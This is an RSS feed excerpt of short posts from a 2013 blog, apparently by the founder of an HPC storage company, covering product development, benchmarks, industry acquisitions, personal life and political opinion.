    <item>
      <title>Oh dear lord</title>
      <link>https://blog.scalability.org/2013/10/oh-dear-lord/</link>
      <pubDate>Mon, 07 Oct 2013 23:30:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/oh-dear-lord/</guid>
      <description>Lets see if this actually materializes. Its pretty obvious as to how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straighforward definition in the US Constitution.</description>
    </item>
    
    <item>
      <title>Starting to build the Tiburon Data Store</title>
      <link>https://blog.scalability.org/2013/10/starting-to-build-the-tiburon-data-store/</link>
      <pubDate>Sat, 05 Oct 2013 16:39:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/starting-to-build-the-tiburon-data-store/</guid>
      <description>This is fun, basically something that I&amp;rsquo;ve wanted to do, and it gets me closer to the point where I&amp;rsquo;ve wanted to be for a while &amp;hellip; building TREDS (Tiburon REliable Data Store). Code is up in the IDE, and I am building the CRUD and metadata portions now. If all goes well (it never does), we should be storing/retrieving objects soon. Very exciting &amp;hellip;</description>
    </item>
    
    <item>
      <title>You get what you vote for</title>
      <link>https://blog.scalability.org/2013/10/you-get-what-you-vote-for/</link>
      <pubDate>Sat, 05 Oct 2013 14:26:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/you-get-what-you-vote-for/</guid>
      <description>This is sad.
Here&amp;rsquo;s the really sad parts of this
 Not only did they close the parks, but they turned off the web sites The park employees are being ordered to make life as hard as possible for the patrons.  None of this had to happen. Had the democrats decided that, ya know, in a political environment where negotiation is the key to advancing agendas, and not a burnt ground strategy, chances are they would be able to get some of what they wanted.</description>
    </item>
    
    <item>
      <title>More benchmarking goodness coming</title>
      <link>https://blog.scalability.org/2013/10/more-benchmarking-goodness-coming/</link>
      <pubDate>Fri, 04 Oct 2013 21:21:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/more-benchmarking-goodness-coming/</guid>
      <description>A new round of industry standard benchmarks coming soon for some of our kit. Well, its technically our appliance built from that platform, but you&amp;rsquo;ll be hearing more on that soon. Very exciting times &amp;hellip; you&amp;rsquo;ll hear more about this soon.</description>
    </item>
    
    <item>
      <title>Moving more of our infrastructure to our dog food ...</title>
      <link>https://blog.scalability.org/2013/10/moving-more-of-our-infrastructure-to-our-dog-food/</link>
      <pubDate>Tue, 01 Oct 2013 15:53:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/10/moving-more-of-our-infrastructure-to-our-dog-food/</guid>
      <description>Many of our functions are hosted on our Virtualization appliance. Our firewall is now running on a siRouter appliance. As always, our internal storage is JackRabbit, and our internal backup is DeltaV. We&amp;rsquo;ll be talking more about all of this in short order. Needless to say, I am quite pleased about this. [update] spoke too soon .. discovered a routing failure that was masked in the appliance. Reverting to the old setup until we can address.</description>
    </item>
    
    <item>
      <title>Dead on correct article</title>
      <link>https://blog.scalability.org/2013/09/dead-on-correct-article/</link>
      <pubDate>Fri, 27 Sep 2013 16:13:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/dead-on-correct-article/</guid>
      <description>What many of us worried about years ago was whether or not we weer electing an empty suit to the highest political office in the land. Someone with no experience running anything. With no great accomplishments upon which to build. Simply a moderate orator with a teleprompter. 5 years in, our worst fears don&amp;rsquo;t even appear to scratch the surface of the failure that we have brought upon ourselves. This piece at the Wall Street Journal is so completely spot on.</description>
    </item>
    
    <item>
      <title>Wonderful changes in Tiburon-RESTful</title>
      <link>https://blog.scalability.org/2013/09/wonderful-changes-in-tiburon-restful/</link>
      <pubDate>Sun, 22 Sep 2013 18:51:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/wonderful-changes-in-tiburon-restful/</guid>
      <description>I&amp;rsquo;ve been rewriting Tiburon to provide a completely sane restful interface. It still does what it did before, but now &amp;hellip; it does it so much more nicely! First: I got rid of the config file. Some folks were having trouble with JSON config files. Creating them is very easy, they are key value stores in 90% of the cases, with the remaining 10% being a &amp;ldquo;default&amp;rdquo; key, and then the value.</description>
    </item>
    
    <item>
      <title>RESTful tiburon tagged</title>
      <link>https://blog.scalability.org/2013/09/restful-tiburon-tagged/</link>
      <pubDate>Sat, 21 Sep 2013 19:29:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/restful-tiburon-tagged/</guid>
      <description>as Alaskan Malamute v0.10. I&amp;rsquo;m a dog guy, what can I say. Hopefully full boot server semantics will be done by end of weekend.</description>
    </item>
    
    <item>
      <title>Starting to really enjoy using MongoDB as a document store</title>
      <link>https://blog.scalability.org/2013/09/starting-to-really-enjoy-using-mongodb-as-a-document-store/</link>
      <pubDate>Sat, 21 Sep 2013 17:13:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/starting-to-really-enjoy-using-mongodb-as-a-document-store/</guid>
      <description>There are a few gotcha&amp;rsquo;s that I am working through. But apart from these (mostly oddities in the interface between Perl and MongoDB), this is making Tiburon RESTful development go much better. I&amp;rsquo;ve just started to scratch the surface of what the combined thing will do.
landman@lightning:~/work/development/tiburon/t$ ./version.pl result = $VAR1 = &#39;{ &amp;quot;version&amp;quot; : &amp;quot;0.1&amp;quot;, &amp;quot;label&amp;quot; : &amp;quot;Alaskan Malamute&amp;quot; }&#39;;  and
landman@lightning:~/work/development/tiburon/t$ ./list_boot_servers.pl result = $VAR1 = &#39; [ { &amp;quot;hostport&amp;quot; : &amp;quot;3001&amp;quot;, &amp;quot;_id&amp;quot; : &amp;quot;523d540e9745f48429000000&amp;quot;, &amp;quot;name&amp;quot; : &amp;quot;test1&amp;quot;, &amp;quot;default&amp;quot; : &amp;quot;false&amp;quot;, &amp;quot;hostname&amp;quot; : &amp;quot;10.</description>
    </item>
    
    <item>
      <title>Ahhh ... the joy that is being used as a 2 by 4</title>
      <link>https://blog.scalability.org/2013/09/ahhh-the-joy-that-is-being-used-as-a-2-by-4/</link>
      <pubDate>Fri, 20 Sep 2013 18:15:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/ahhh-the-joy-that-is-being-used-as-a-2-by-4/</guid>
      <description>I didn&amp;rsquo;t quite see this one in all its glory, but had an inkling that things were not as they appeared to be. Annoying, but one lives, learns, and continues. No details.</description>
    </item>
    
    <item>
      <title>... and Nirvanix shutters ...</title>
      <link>https://blog.scalability.org/2013/09/and-nirvanix-shutters/</link>
      <pubDate>Tue, 17 Sep 2013 21:07:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/and-nirvanix-shutters/</guid>
      <description>Traction, paying customers, revenue and cashflow are what matter to small businesses looking to grow up. In many ways we (the day job) were lucky as we built a sustainable business first, with real customers and real revenue. Most startups don&amp;rsquo;t do that. They have a change the world idea, and then try to evangelize this whilst building a business. Sometimes they have to &amp;ldquo;pivot&amp;rdquo; or &amp;hellip; change focus to an idea that will work at turning into a business.</description>
    </item>
    
    <item>
      <title>Worlds first low latency cloud</title>
      <link>https://blog.scalability.org/2013/09/worlds-first-low-latency-cloud/</link>
      <pubDate>Tue, 17 Sep 2013 14:12:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/worlds-first-low-latency-cloud/</guid>
      <description>PR from the day job. Remember I&amp;rsquo;ve been dying to tell people about the ultra cool project we&amp;rsquo;ve been working on for the last year? Well, this is it. More soon, but I am thrilled we can talk about it now!</description>
    </item>
    
    <item>
      <title>Why is Java used in teaching programming in high schools?</title>
      <link>https://blog.scalability.org/2013/09/why-is-java-used-in-teaching-programming-in-high-schools/</link>
      <pubDate>Mon, 16 Sep 2013 03:29:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/why-is-java-used-in-teaching-programming-in-high-schools/</guid>
      <description>Seriously &amp;hellip; My daughter is taking a computer class, and for reasons I cannot fathom, they are using an AP Java book (an old one at that, written when Java 5 was new), and more importantly and more concerningly, the Java language itself. I&amp;rsquo;ve got many qualms about using Java for teaching (or development, but thats for other posts). For new students, early exposure to its rigid and verbose &amp;hellip; one might argue &amp;hellip; excessively verbose &amp;hellip; syntax and structure, don&amp;rsquo;t quite lend themselves to an understanding of how algorithms and computers work.</description>
    </item>
    
    <item>
      <title>Slight annoyance with argument processing</title>
      <link>https://blog.scalability.org/2013/09/slight-annoyance-with-argument-processing/</link>
      <pubDate>Mon, 16 Sep 2013 01:25:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/slight-annoyance-with-argument-processing/</guid>
      <description>Tiburon as a service. I&amp;rsquo;ll talk about this at some point, and describe what I mean, but I have to say that I&amp;rsquo;ve been blown away by the response to it from many places and customers. I&amp;rsquo;ve been working on making the API restful, and finally &amp;hellip; finally &amp;hellip; incorporating a noSQL DB on the back end to make the replication and other bits trivial. We are using MongoDB for this.</description>
    </item>
    
    <item>
      <title>Bitten by VirtualBox yet again, moving to kvm</title>
      <link>https://blog.scalability.org/2013/09/bitten-by-virtualbox-yet-again-moving-to-kvm/</link>
      <pubDate>Thu, 12 Sep 2013 20:55:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/bitten-by-virtualbox-yet-again-moving-to-kvm/</guid>
      <description>I like VirtualBox. Have for a long time. But it has some &amp;hellip; well &amp;hellip; interesting failure modes. Including some that have locked up my host machine. The problem for me is that I&amp;rsquo;ve got my Windows desktop environment for my normal desktop hosted there. And I need this every now and then. Today was the final straw. Working on a document about some of our updates in Word. I don&amp;rsquo;t like Word, but some of our partners use it, and its easier to use it than to fight the battle convincing them to use LibreOffice.</description>
    </item>
    
    <item>
      <title>More M&amp;A</title>
      <link>https://blog.scalability.org/2013/09/more-ma-2/</link>
      <pubDate>Tue, 10 Sep 2013 17:32:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/more-ma-2/</guid>
      <description>Two items.
 our friends at Virident are now part of WD. I am happy Kumar, Yatin and crew got a nice exit. I am not thrilled at where they landed. Virident joins STEC at WD. But as with STEC, this looks like this is on the HGST side of things, which appears to still be building separate and quality product. We will buy and ship HGST. Whiptail was acquired by Cisco.</description>
    </item>
    
    <item>
      <title>Special at the party after HPC on Wall Street</title>
      <link>https://blog.scalability.org/2013/09/special-at-the-party-after-hpc-on-wall-street/</link>
      <pubDate>Sat, 07 Sep 2013 03:02:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/special-at-the-party-after-hpc-on-wall-street/</guid>
      <description>The worlds first low latency drink to go with the next generation low latency cloud &amp;hellip; the Scalable low latentini. Yes, its real &amp;hellip;</description>
    </item>
    
    <item>
      <title>Day job at HPC on Wall Street on Monday the 9th</title>
      <link>https://blog.scalability.org/2013/09/day-job-at-hpc-on-wall-street-on-monday-the-9th/</link>
      <pubDate>Fri, 06 Sep 2013 20:12:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/day-job-at-hpc-on-wall-street-on-monday-the-9th/</guid>
      <description>We&amp;rsquo;ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think &amp;lsquo;bloody fast NAT&amp;rsquo; and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.</description>
    </item>
    
    <item>
      <title>Definitely having one of those days</title>
      <link>https://blog.scalability.org/2013/09/definitely-having-one-of-those-days/</link>
      <pubDate>Fri, 06 Sep 2013 19:49:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/definitely-having-one-of-those-days/</guid>
      <description>Massive frustration on multiple fronts, and a few unwelcome surprises. I wish I had karate tonight, and fight night in particular. Lots to work off. I&amp;rsquo;ll have to be satisfied with weight training tomorrow, and a nice long dog walk tonight.</description>
    </item>
    
    <item>
      <title>More M&amp;A:  Microsoft buys Nokia</title>
      <link>https://blog.scalability.org/2013/09/more-ma-microsoft-buys-nokia/</link>
      <pubDate>Tue, 03 Sep 2013 04:44:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/more-ma-microsoft-buys-nokia/</guid>
      <description>This one was almost obvious, it was simply a matter of &amp;ldquo;when&amp;rdquo;. Microsoft is trying to put some wood behind its Mobile OS arrow. No one seems to want it, save for the 41MP camera &amp;ldquo;phone&amp;rdquo;. In the big picture, Microsoft saw the beginning of an erosion of its market power recently, as more people opted for mobile platforms, and fewer opted for PCs and laptops. There is a convenience and cost play going on at the same time.</description>
    </item>
    
    <item>
      <title>Latest DeltaV benchmarks</title>
      <link>https://blog.scalability.org/2013/09/latest-deltav-benchmarks/</link>
      <pubDate>Sun, 01 Sep 2013 21:08:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/latest-deltav-benchmarks/</guid>
      <description>24 bay system, big RAID6. Reads/write 4x RAM size.
[root@dv4-3 ~]# df -h /data Filesystem Size Used Avail Use% Mounted on /dev/md2 55T 65G 55T 1% /data ... WRITE: io=65505MB, aggrb=1580.2MB/s, minb=1580.2MB/s, maxb=1580.2MB/s, mint=41433msec, maxt=41433msec READ: io=65505MB, aggrb=2429.4MB/s, minb=2429.4MB/s, maxb=2429.4MB/s, mint=26964msec, maxt=26964msec  </description>
    </item>
    
    <item>
      <title>Spot on discussion of a fake crisis</title>
      <link>https://blog.scalability.org/2013/09/spot-on-discussion-of-a-fake-crisis/</link>
      <pubDate>Sun, 01 Sep 2013 20:14:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/09/spot-on-discussion-of-a-fake-crisis/</guid>
      <description>Over at IEEE Spectrum, there is a wonderful article that delves into the latest phase of the alleged massive need for more STEM workers. This is a topic I&amp;rsquo;ve covered a number of times, here, here, here, and here. TL;DR version for newbies: If someone is trying to sell you on this to get you to decide to go get an STEM degree, then there&amp;rsquo;s a pretty good probability you are in the process of being deceived.</description>
    </item>
    
    <item>
      <title>Why I&#39;ve not been posting</title>
      <link>https://blog.scalability.org/2013/08/why-ive-not-been-posting/</link>
      <pubDate>Sat, 31 Aug 2013 15:39:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/why-ive-not-been-posting/</guid>
      <description>Just insanely busy, more so than usual. We are getting close to double digits in employees in the day job. I suspect we&amp;rsquo;ll cross this in September/October. More news soon, including some wonderful new partners, products, and business bits. I won&amp;rsquo;t say where at this moment, but you can start searching around for the SI logo on a few folks sites &amp;hellip;</description>
    </item>
    
    <item>
      <title>Entrepreneurs are optimists</title>
      <link>https://blog.scalability.org/2013/08/entrepreneurs-are-optimists/</link>
      <pubDate>Sat, 31 Aug 2013 15:35:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/entrepreneurs-are-optimists/</guid>
      <description>This is something I&amp;rsquo;ve been meaning to write about for a while. There are many reasons one might decide to be an entrepreneur. For me the journey was fairly simple. In graduate school, I saw the sea change in my field with the influx of FSU scientists with much greater seniority, many more publications, etc. taking up postdoc and tenure track positions around the time I finished up. I knew I had to alter my vision of what I wanted to do in my professional career, and happily SGI came along and gave me the opportunity to spend time in industry.</description>
    </item>
    
    <item>
      <title>Day job at HPC on Wall Street</title>
      <link>https://blog.scalability.org/2013/08/day-job-at-hpc-on-wall-street/</link>
      <pubDate>Sat, 31 Aug 2013 14:58:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/day-job-at-hpc-on-wall-street/</guid>
      <description>Ok, this is getting to be a common theme. We go to HPC on Wall Street. We show off new kit. And we are hosting a party. Go figure. There will be more on this very soon. You will see the new kit at our new large booth at SC13. The first element of the new kit is a software defined networking powerhouse behind a new global financial cloud. The group building out the cloud will be there with us, ready to talk to people about what they are doing, and why financial types should sign up for this cloud.</description>
    </item>
    
    <item>
      <title>NextIO shuts its doors and liquidates</title>
      <link>https://blog.scalability.org/2013/08/nextio-shuts-its-doors-and-liquidates/</link>
      <pubDate>Mon, 26 Aug 2013 14:01:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/nextio-shuts-its-doors-and-liquidates/</guid>
      <description>As seen here and here.
There are lessons to be learned, and wisdom had from the articles. As the founder noted</description>
    </item>
    
    <item>
      <title>I have finally given in to the borg collective</title>
      <link>https://blog.scalability.org/2013/08/i-have-finally-given-in-to-the-borg-collective/</link>
      <pubDate>Mon, 19 Aug 2013 03:31:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/i-have-finally-given-in-to-the-borg-collective/</guid>
      <description>I am now on Facebook. Turns out my family and all my friends are there, so &amp;hellip; &amp;hellip; how soon before we have to change for the next great social network platform? I&amp;rsquo;ve got more than one Twitter account (@sijoe and @scalableinfo), a linkedin account, a google+ account (that for the life of me I can&amp;rsquo;t really figure out), and now facebook. Not to mention 2 blogs (here and at work).</description>
    </item>
    
    <item>
      <title>bitten yet again by ancient packages in CentOS (and RHEL)</title>
      <link>https://blog.scalability.org/2013/08/bitten-yet-again-by-ancient-packages-in-centos-and-rhel/</link>
      <pubDate>Sun, 11 Aug 2013 00:51:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/bitten-yet-again-by-ancient-packages-in-centos-and-rhel/</guid>
      <description>This is not a CentOS issue in that they merely rebuild the RHEL sources without the copyrighted bits. But its getting to the point where the RHEL bits are so badly out of date, that the platform is rapidly getting to the point of unusability. When I have to rebuild packages from source, as no up-to-date patched source RPM or even binary RPM exists for little used packages such as, I dunno &amp;hellip; apache?</description>
    </item>
    
    <item>
      <title>When you cross the rubicon</title>
      <link>https://blog.scalability.org/2013/08/when-you-cross-the-rubicon/</link>
      <pubDate>Sat, 10 Aug 2013 03:22:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/when-you-cross-the-rubicon/</guid>
      <description>&amp;hellip; from hobby and sport, to something more. I&amp;rsquo;ve traveled 1k miles for karate tournaments (to participate). I have not, as of yet, crossed an international border for one. That changes tomorrow. I went through a promotion test last week with an injured intercostal muscle. This caused all sorts of joy &amp;hellip; no really &amp;hellip; and had me think that I had a serious kidney stone flare up. The pain was in the same region, and toradol helped, which drew me to a rapid, and incorrect conclusion as to the pain.</description>
    </item>
    
    <item>
      <title>how not to write driver Makefiles or configuration scripts</title>
      <link>https://blog.scalability.org/2013/08/how-not-to-write-driver-makefiles-or-configuration-scripts/</link>
      <pubDate>Tue, 06 Aug 2013 22:43:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/how-not-to-write-driver-makefiles-or-configuration-scripts/</guid>
      <description>if [uname -r eq ...] Its very bad form to insist on very particular versions of an OS/kernel. Not only will you piss off your customer (me), you will cause a great deal of effort to unwind the ill-considered test in order to get even basic functionality. I&amp;rsquo;ve seen this on network cards, RAID cards, you name it. It increases your support load, decreases the likelihood that you can actually support whats out there &amp;hellip; say for example, someone does a &amp;lsquo;yum update&amp;rsquo; and gets an updated kernel.</description>
    </item>
    
    <item>
      <title>Day job blog on turning 11 is up</title>
      <link>https://blog.scalability.org/2013/08/day-job-blog-on-turning-11-is-up/</link>
      <pubDate>Thu, 01 Aug 2013 17:13:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/08/day-job-blog-on-turning-11-is-up/</guid>
      <description>Here . We are looking forward to the next 11 years :D</description>
    </item>
    
    <item>
      <title>A cri de couer for Perl</title>
      <link>https://blog.scalability.org/2013/07/a-cri-de-couer-for-perl/</link>
      <pubDate>Wed, 31 Jul 2013 16:41:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/a-cri-de-couer-for-perl/</guid>
      <description>As seen here. I enjoy developing code in Perl. I know, I know, its &amp;ldquo;the write only language&amp;rdquo; and &amp;ldquo;looks like line noise&amp;rdquo;. It has endured some rather nasty FUD in its day, and yet, it keeps on growing in use. It is just an incredibly powerful, quite expressive language. One which enables you to write very terse code if you wish. But the presentation isn&amp;rsquo;t concerned with terseness, but with development into a modern programming language.</description>
    </item>
    
    <item>
      <title>The day job is 11 years old</title>
      <link>https://blog.scalability.org/2013/07/the-day-job-is-11-years-old/</link>
      <pubDate>Wed, 31 Jul 2013 13:52:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/the-day-job-is-11-years-old/</guid>
      <description>Last year, I had been incensed at this time, by a US presidential candidate and mindset from him who told me, and every other entrepreneur out there, that &amp;ldquo;we didn&amp;rsquo;t build it&amp;rdquo;. It was a foolish thing for him to say, foolish for his party and fellow travelers to echo. Yet echo it they did. I quietly promised myself to double down on my hard work, the work I did, and see if I could smash the previous years smashing financial records.</description>
    </item>
    
    <item>
      <title>and the M&amp;A accelerates</title>
      <link>https://blog.scalability.org/2013/07/and-the-ma-accelerates/</link>
      <pubDate>Tue, 30 Jul 2013 10:39:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/and-the-ma-accelerates/</guid>
      <description>NVidia grabs the Portland Group. This makes sense, as NVIdia has had CUDA, which is LLVM based, and needed a more general purpose compiler technology. There is nothing wrong with CUDA, but its very GPU specific. PGI tech allows them to talk very generally, and get support for non-GPU hardware acceleration. Such as massive collections of ARM. I expect more M&amp;amp;A; and investment activity over the next few months.</description>
    </item>
    
    <item>
      <title>One of the joys of running a company</title>
      <link>https://blog.scalability.org/2013/07/one-of-the-joys-of-running-a-company/</link>
      <pubDate>Mon, 22 Jul 2013 20:45:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/one-of-the-joys-of-running-a-company/</guid>
      <description>&amp;hellip; is when large multi-hundred million or multi-billion dollar public companies try to ignore &amp;ldquo;small&amp;rdquo; bills from smaller than multi-hundred million dollar companies. Very much related to this. We are operationally funded. Every dollar I pay my team with comes from cash flow. So when companies try to cheat us out of money by not paying their bills, and then ignore our requests for payment &amp;hellip; Yeah, this gets old. I prodded a reseller on this pretty hard today.</description>
    </item>
    
    <item>
      <title>Part of the reason why Detroit has a long rough road ahead</title>
      <link>https://blog.scalability.org/2013/07/part-of-the-reason-why-detroit-has-a-long-rough-road-ahead/</link>
      <pubDate>Fri, 19 Jul 2013 23:36:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/part-of-the-reason-why-detroit-has-a-long-rough-road-ahead/</guid>
      <description>is due, in significant part, to bad law and bad policy enshrined in law. Ideological view points are hard coded in the firmware of Michigan. Which allows lawsuits and results such as this. It cannot be overemphasized how bone-headed this particular law is. That one can never, under any circumstances, reduce pensioner benefit values. This means, if you ever struck a bad deal, like Detroit, and many others in Michigan have, you have no choice but to continue this bad deal for eternity.</description>
    </item>
    
    <item>
      <title>... and bang goes Detroit ...</title>
      <link>https://blog.scalability.org/2013/07/and-bang-goes-detroit/</link>
      <pubDate>Thu, 18 Jul 2013 21:30:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/and-bang-goes-detroit/</guid>
      <description>This brings me no joy. I went to grad school in Detroit. I like this city. It has character, it has guts, it has potential. It also has no cash to continue operations. And that sucks. Detroit filed for chapter 9 bankruptcy a few hours ago. There are many reasons for this, but there are a number of specific ones, that are generalizable to businesses as well. First, population decline has led to a tax revenue decline.</description>
    </item>
    
    <item>
      <title>Dear NSA PRISM folks, we have a problem we need your help with</title>
      <link>https://blog.scalability.org/2013/07/dear-nsa-prism-folks-we-have-a-problem-we-need-your-help-with/</link>
      <pubDate>Tue, 16 Jul 2013 20:48:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/dear-nsa-prism-folks-we-have-a-problem-we-need-your-help-with/</guid>
      <description>A scammer has been spoofing the day job&amp;rsquo;s number for the last year and a half. We&amp;rsquo;ve have been trying &amp;hellip; very hard &amp;hellip; to get anyone at all, to cooperate with us to try to find out whom these losers are, so we can take them out. We have had no luck. No one wants to help. No one. Even execs at phone companies. Go figure. One kid called last year so incensed that his mother was targeted by the scammers that he said he was going to get a gun and go meet with these jokers.</description>
    </item>
    
    <item>
      <title>Another bucket list item</title>
      <link>https://blog.scalability.org/2013/07/another-bucket-list-item/</link>
      <pubDate>Fri, 05 Jul 2013 00:48:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/another-bucket-list-item/</guid>
      <description>On my vacation in NY recently, I happened to be able to tick off another item on my bucket list. There&amp;rsquo;s some background to it, but here&amp;rsquo;s the pics.
[ ](/images/IMG_1454.JPG)
[ ](/images/IMG_1456.JPG)
and
[ ](/images/IMG_1459.JPG)
The background to this is a short story I&amp;rsquo;ve been working on for a while. A near future serum run in effect. Should be done very soon, though I&amp;rsquo;ve been working on it in very short bursts.</description>
    </item>
    
    <item>
      <title>M&amp;A roundup</title>
      <link>https://blog.scalability.org/2013/07/ma-roundup/</link>
      <pubDate>Tue, 02 Jul 2013 16:58:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/07/ma-roundup/</guid>
      <description>I&amp;rsquo;ve not reported it, but STEC was acquired by Western Digital. STEC has been one of the day job&amp;rsquo;s partners for high performance SSD technology. Unfortunately, we&amp;rsquo;ve not had great luck with WD in the past. Even gone so far as to recall/replace specific models from every machine shipped globally with those drives, due to very high failure rates, and a complete unwillingness on the part of WD to either admit defective firmware, or RMA defective drives.</description>
    </item>
    
    <item>
      <title>ISC13 video</title>
      <link>https://blog.scalability.org/2013/06/isc13-video/</link>
      <pubDate>Thu, 27 Jun 2013 18:55:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/isc13-video/</guid>
      <description>[vacation edition: posted from an undisclosed location somewhere off 9A in Fishkill NY, after leaving a really bad airbnb experience in Scarsdale NY] Here Russell from Scalable Informatics and Rich from InsideHPC (check em out!) talk about STAC M3 benchmarks, siCloud (aka &amp;lsquo;the beast&#39;), and some of the capability class tests we ran. More later, but I am on vacation &amp;hellip;</description>
    </item>
    
    <item>
      <title>Very fast cloud scale tightly coupled computing and storage</title>
      <link>https://blog.scalability.org/2013/06/very-fast-cloud-scale-tightly-coupled-computing-and-storage/</link>
      <pubDate>Thu, 20 Jun 2013 16:09:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/very-fast-cloud-scale-tightly-coupled-computing-and-storage/</guid>
      <description>I&amp;rsquo;ve been hinting at, and alluding to a benchmark we (the day job) ran on a new product for a while. I took a month to rerun these tests, verifying everything. I wanted to make sure that we got this right. Because these are big numbers. Then we sat on it for another month. Give us time to reflect, what will people&amp;rsquo;s reaction be? We slowly leaked a few pointers to people.</description>
    </item>
    
    <item>
      <title>Contemplating replacing the whole init script for stateless booting</title>
      <link>https://blog.scalability.org/2013/06/contemplating-replacing-the-whole-init-script-for-stateless-booting/</link>
      <pubDate>Wed, 19 Jun 2013 20:49:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/contemplating-replacing-the-whole-init-script-for-stateless-booting/</guid>
      <description>Its probably fair to say that CentOS/RHEL startup mechanism is, well, broken beyond repair for anything but trivial cases. Out of the box, NFS root doesn&amp;rsquo;t work, and its very &amp;hellip; extraordinarily &amp;hellip; hard &amp;hellip; to make it work. iSCSI and other connection mechanisms don&amp;rsquo;t work. This has been the case since 6.0. 6.4 continues the long tradition of working for trivial cases, and not working for anything remotely more interesting.</description>
    </item>
    
    <item>
      <title>Two screwups in two days</title>
      <link>https://blog.scalability.org/2013/06/two-screwups-in-two-days/</link>
      <pubDate>Wed, 12 Jun 2013 19:14:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/two-screwups-in-two-days/</guid>
      <description>So the day job released some PR. I paid attention to the content, but not to the title. Unfortunately should have. We set records for the 2.8 version of kdb+. The title suggests otherwise. Call this a Mea Culpa, as I had approved the content before I saw the new results with the 3.1 version. So the PR went out, and I think I&amp;rsquo;ve got egg on my face :( .</description>
    </item>
    
    <item>
      <title>Crazy travel schedule ahead</title>
      <link>https://blog.scalability.org/2013/06/crazy-travel-schedule-ahead/</link>
      <pubDate>Mon, 10 Jun 2013 16:37:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/crazy-travel-schedule-ahead/</guid>
      <description>Off to Chicago tonight to present at the STAC Summit tomorrow. Then meeting customers on Wednesday, phone calls, and a partner event. Thursday, back to Detroit, then I fly out to NYC to meet customers on Friday. Back Saturday morning for our national karate tournament (and I am very behind in my practice) for our style. Then Sunday back to NY to present Monday at the STAC Summit in NYC. Back to Detroit on Tuesday, then Friday, in theory, I have a 10 days off for vacation.</description>
    </item>
    
    <item>
      <title>You can&#39;t make this stuff up, 10-June-2013 edition</title>
      <link>https://blog.scalability.org/2013/06/you-cant-make-this-stuff-up-10-june-2013-edition/</link>
      <pubDate>Mon, 10 Jun 2013 15:59:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/you-cant-make-this-stuff-up-10-june-2013-edition/</guid>
      <description>Link here. Don&amp;rsquo;t want to tax ALL businesses &amp;hellip; out of business? Just some of them? Are you mad? Are you freaking kidding me? Pulling my leg? Very sad. Very very sad. The government should be seeking to reduce taxes to make sure businesses grow, and hire, and spend. Mr. President, the entire role of government in business should be to get out of the way, lest you slow down growth, employment, and spending.</description>
    </item>
    
    <item>
      <title>That&#39;s what now ... 5 live scandals?</title>
      <link>https://blog.scalability.org/2013/06/thats-what-now-5-live-scandals/</link>
      <pubDate>Sat, 08 Jun 2013 17:27:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/06/thats-what-now-5-live-scandals/</guid>
      <description>[Update] That didn&amp;rsquo;t take long. Looks like the government is angry about all of this. The leak of the leaks that is. And they are going to try to find the culprit, and prosecute them. Any &amp;ldquo;Mea Culpas&amp;rdquo; from them on the fact that this is &amp;hellip; I dunno &amp;hellip; illegal? Er &amp;hellip; no. Most transparent admin &amp;hellip; evuh??? I read something last week which made me laugh. It read &amp;ldquo;tomorrow is Thursday, time for a new scandal&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>You can get a hint of the big test result by watching the rotating banner on the day job home page</title>
